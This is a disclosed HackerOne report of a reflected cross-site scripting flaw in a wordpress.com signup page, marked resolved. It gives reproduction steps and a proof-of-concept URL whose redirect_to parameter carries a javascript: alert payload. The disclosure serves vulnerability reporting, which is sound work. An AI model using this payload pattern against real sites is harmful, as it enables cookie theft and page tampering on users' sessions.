reflected xss in https://wordpress.com/start/account/user

Disclosed: 2023-11-15 11:22:58 By secureighty To automattic
Medium
Vulnerability Details
## Summary: xss after login at https://wordpress.com/start/account/user?variationName=free&redirect_to=javascript:alert(document.domain) ## Platform(s) Affected: web ## Steps To Reproduce: 1. auth normally 1. go to https://wordpress.com/start/account/user?variationName=free&redirect_to=javascript:alert(document.domain) **while already authenticated** and click continue 1. xss procs ## Supporting Material/References: █████ ## Impact XSS can be used to steal cookies, modify html content, and much more
Actions
View on HackerOne
Report Stats
  • Report ID: 2055132
  • State: Closed
  • Substate: resolved
  • Upvotes: 39
Share this report